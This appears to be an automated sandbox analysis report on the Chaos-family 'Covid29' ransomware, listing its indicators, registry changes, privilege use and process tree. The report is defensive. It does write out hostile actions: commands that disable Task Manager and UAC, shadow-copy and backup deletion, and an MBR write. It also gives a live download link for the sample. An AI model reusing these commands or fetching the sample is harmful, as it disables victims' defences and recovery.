Analysis
-
max time kernel
71s -
max time network
71s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16-10-2024 12:58
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/pankoza2-pl/malwaredatabase-old/raw/refs/heads/main/Covid29-Ransomware/Covid29%20Ransomware.zip
Resource
win10v2004-20241007-en
General
-
Target
https://github.com/pankoza2-pl/malwaredatabase-old/raw/refs/heads/main/Covid29-Ransomware/Covid29%20Ransomware.zip
Malware Config
Signatures
-
Chaos
Ransomware family first seen in June 2021.
-
Chaos Ransomware 4 IoCs
resource yara_rule behavioral1/files/0x0007000000023c7d-97.dat family_chaos behavioral1/memory/5996-101-0x0000000000FD0000-0x0000000000FF0000-memory.dmp family_chaos behavioral1/memory/5444-172-0x0000000000400000-0x00000000005D5000-memory.dmp family_chaos behavioral1/memory/5444-179-0x0000000000400000-0x00000000005D5000-memory.dmp family_chaos -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 6024 bcdedit.exe 2336 bcdedit.exe -
pid Process 1184 wbadmin.exe -
Disables Task Manager via registry modification
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation Cov29Cry.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation cmd.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini svchost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\covid29-is-here.txt svchost.exe -
Executes dropped EXE 4 IoCs
pid Process 5968 mbr.exe 5996 Cov29Cry.exe 3628 svchost.exe 304 Cov29LockScreen.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 34 IoCs
description ioc Process File opened for modification C:\Users\Admin\Links\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini svchost.exe File opened for modification C:\Users\Public\Videos\desktop.ini svchost.exe File opened for modification C:\Users\Public\Desktop\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini svchost.exe File opened for modification C:\Users\Public\Pictures\desktop.ini svchost.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-3756129449-3121373848-4276368241-1000\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini svchost.exe File opened for modification C:\Users\Public\Documents\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Documents\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Music\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini svchost.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini svchost.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini svchost.exe File opened for modification C:\Users\Public\Music\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Searches\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Videos\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini svchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 16 raw.githubusercontent.com 17 raw.githubusercontent.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 mbr.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\eaee4r7xd.jpg" svchost.exe -
resource yara_rule behavioral1/memory/5444-68-0x0000000000400000-0x00000000005D5000-memory.dmp upx behavioral1/memory/5444-172-0x0000000000400000-0x00000000005D5000-memory.dmp upx behavioral1/memory/5444-179-0x0000000000400000-0x00000000005D5000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 16 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TrojanRansomCovid29.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mbr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shutdown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Cov29LockScreen.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5724 PING.EXE 6092 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName vds.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 5700 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 5252 taskkill.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings svchost.exe -
Modifies registry key 1 TTPs 7 IoCs
pid Process 5924 reg.exe 5940 reg.exe 5844 reg.exe 5860 reg.exe 5876 reg.exe 5908 reg.exe 5892 reg.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 5724 PING.EXE 6092 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3628 svchost.exe -
Suspicious behavior: EnumeratesProcesses 59 IoCs
pid Process 2764 msedge.exe 2764 msedge.exe 1864 msedge.exe 1864 msedge.exe 3960 identity_helper.exe 3960 identity_helper.exe 1252 msedge.exe 1252 msedge.exe 5996 Cov29Cry.exe 5996 Cov29Cry.exe 5996 Cov29Cry.exe 5996 Cov29Cry.exe 5996 Cov29Cry.exe 5996 Cov29Cry.exe 5996 Cov29Cry.exe 5996 Cov29Cry.exe 5996 Cov29Cry.exe 5996 Cov29Cry.exe 5996 Cov29Cry.exe 5996 Cov29Cry.exe 5996 Cov29Cry.exe 5996 Cov29Cry.exe 5996 Cov29Cry.exe 5996 Cov29Cry.exe 5996 Cov29Cry.exe 5996 Cov29Cry.exe 5996 Cov29Cry.exe 5996 Cov29Cry.exe 5996 Cov29Cry.exe 5996 Cov29Cry.exe 5996 Cov29Cry.exe 5996 Cov29Cry.exe 5996 Cov29Cry.exe 5996 Cov29Cry.exe 3628 svchost.exe 3628 svchost.exe 3628 svchost.exe 3628 svchost.exe 3628 svchost.exe 3628 svchost.exe 3628 svchost.exe 3628 svchost.exe 3628 svchost.exe 3628 svchost.exe 3628 svchost.exe 3628 svchost.exe 3628 svchost.exe 3628 svchost.exe 3628 svchost.exe 3628 svchost.exe 3628 svchost.exe 3628 svchost.exe 3628 svchost.exe 3628 svchost.exe 3628 svchost.exe 3628 svchost.exe 3628 svchost.exe 3628 svchost.exe 3628 svchost.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe -
Suspicious use of AdjustPrivilegeToken 53 IoCs
description pid Process Token: SeShutdownPrivilege 6024 shutdown.exe Token: SeRemoteShutdownPrivilege 6024 shutdown.exe Token: SeDebugPrivilege 5996 Cov29Cry.exe Token: SeDebugPrivilege 3628 svchost.exe Token: SeBackupPrivilege 5732 vssvc.exe Token: SeRestorePrivilege 5732 vssvc.exe Token: SeAuditPrivilege 5732 vssvc.exe Token: SeIncreaseQuotaPrivilege 5944 WMIC.exe Token: SeSecurityPrivilege 5944 WMIC.exe Token: SeTakeOwnershipPrivilege 5944 WMIC.exe Token: SeLoadDriverPrivilege 5944 WMIC.exe Token: SeSystemProfilePrivilege 5944 WMIC.exe Token: SeSystemtimePrivilege 5944 WMIC.exe Token: SeProfSingleProcessPrivilege 5944 WMIC.exe Token: SeIncBasePriorityPrivilege 5944 WMIC.exe Token: SeCreatePagefilePrivilege 5944 WMIC.exe Token: SeBackupPrivilege 5944 WMIC.exe Token: SeRestorePrivilege 5944 WMIC.exe Token: SeShutdownPrivilege 5944 WMIC.exe Token: SeDebugPrivilege 5944 WMIC.exe Token: SeSystemEnvironmentPrivilege 5944 WMIC.exe Token: SeRemoteShutdownPrivilege 5944 WMIC.exe Token: SeUndockPrivilege 5944 WMIC.exe Token: SeManageVolumePrivilege 5944 WMIC.exe Token: 33 5944 WMIC.exe Token: 34 5944 WMIC.exe Token: 35 5944 WMIC.exe Token: 36 5944 WMIC.exe Token: SeIncreaseQuotaPrivilege 5944 WMIC.exe Token: SeSecurityPrivilege 5944 WMIC.exe Token: SeTakeOwnershipPrivilege 5944 WMIC.exe Token: SeLoadDriverPrivilege 5944 WMIC.exe Token: SeSystemProfilePrivilege 5944 WMIC.exe Token: SeSystemtimePrivilege 5944 WMIC.exe Token: SeProfSingleProcessPrivilege 5944 WMIC.exe Token: SeIncBasePriorityPrivilege 5944 WMIC.exe Token: SeCreatePagefilePrivilege 5944 WMIC.exe Token: SeBackupPrivilege 5944 WMIC.exe Token: SeRestorePrivilege 5944 WMIC.exe Token: SeShutdownPrivilege 5944 WMIC.exe Token: SeDebugPrivilege 5944 WMIC.exe Token: SeSystemEnvironmentPrivilege 5944 WMIC.exe Token: SeRemoteShutdownPrivilege 5944 WMIC.exe Token: SeUndockPrivilege 5944 WMIC.exe Token: SeManageVolumePrivilege 5944 WMIC.exe Token: 33 5944 WMIC.exe Token: 34 5944 WMIC.exe Token: 35 5944 WMIC.exe Token: 36 5944 WMIC.exe Token: SeBackupPrivilege 4052 wbengine.exe Token: SeRestorePrivilege 4052 wbengine.exe Token: SeSecurityPrivilege 4052 wbengine.exe Token: SeDebugPrivilege 5252 taskkill.exe -
Suspicious use of FindShellTrayWindow 33 IoCs
pid Process 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 304 Cov29LockScreen.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1864 wrote to memory of 2060 1864 msedge.exe 84 PID 1864 wrote to memory of 2060 1864 msedge.exe 84 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 3316 1864 msedge.exe 85 PID 1864 wrote to memory of 2764 1864 msedge.exe 86 PID 1864 wrote to memory of 2764 1864 msedge.exe 86 PID 1864 wrote to memory of 4108 1864 msedge.exe 87 PID 1864 wrote to memory of 4108 1864 msedge.exe 87 PID 1864 wrote to memory of 4108 1864 msedge.exe 87 PID 1864 wrote to memory of 4108 1864 msedge.exe 87 PID 1864 wrote to memory of 4108 1864 msedge.exe 87 PID 1864 wrote to memory of 4108 1864 msedge.exe 87 PID 1864 wrote to memory of 4108 1864 msedge.exe 87 PID 1864 wrote to memory of 4108 1864 msedge.exe 87 PID 1864 wrote to memory of 4108 1864 msedge.exe 87 PID 1864 wrote to memory of 4108 1864 msedge.exe 87 PID 1864 wrote to memory of 4108 1864 msedge.exe 87 PID 1864 wrote to memory of 4108 1864 msedge.exe 87 PID 1864 wrote to memory of 4108 1864 msedge.exe 87 PID 1864 wrote to memory of 4108 1864 msedge.exe 87 PID 1864 wrote to memory of 4108 1864 msedge.exe 87 PID 1864 wrote to memory of 4108 1864 msedge.exe 87 PID 1864 wrote to memory of 4108 1864 msedge.exe 87 PID 1864 wrote to memory of 4108 1864 msedge.exe 87 PID 1864 wrote to memory of 4108 1864 msedge.exe 87 PID 1864 wrote to memory of 4108 1864 msedge.exe 87 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/pankoza2-pl/malwaredatabase-old/raw/refs/heads/main/Covid29-Ransomware/Covid29%20Ransomware.zip1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd0c6c46f8,0x7ffd0c6c4708,0x7ffd0c6c47182⤵PID:2060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,13096272314883155607,5190374165375919480,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2064 /prefetch:22⤵PID:3316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,13096272314883155607,5190374165375919480,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:2764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,13096272314883155607,5190374165375919480,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2872 /prefetch:82⤵PID:4108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13096272314883155607,5190374165375919480,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:12⤵PID:3656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13096272314883155607,5190374165375919480,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:12⤵PID:4188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,13096272314883155607,5190374165375919480,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:82⤵PID:1628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,13096272314883155607,5190374165375919480,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13096272314883155607,5190374165375919480,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4772 /prefetch:12⤵PID:3984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13096272314883155607,5190374165375919480,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4784 /prefetch:12⤵PID:2452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2052,13096272314883155607,5190374165375919480,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3472 /prefetch:82⤵PID:4844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13096272314883155607,5190374165375919480,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:12⤵PID:1460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2052,13096272314883155607,5190374165375919480,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5956 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1252
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13096272314883155607,5190374165375919480,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5964 /prefetch:12⤵PID:1564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13096272314883155607,5190374165375919480,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5976 /prefetch:12⤵PID:4168
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3812
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1436
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5236
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Covid29 Ransomware.zip\TrojanRansomCovid29.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_Covid29 Ransomware.zip\TrojanRansomCovid29.exe"1⤵
- System Location Discovery: System Language Discovery
PID:5444 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C033.tmp\TrojanRansomCovid29.bat" "2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:5616 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\C033.tmp\fakeerror.vbs"3⤵
- System Location Discovery: System Language Discovery
PID:5708
-
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 23⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5724
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5844
-
-
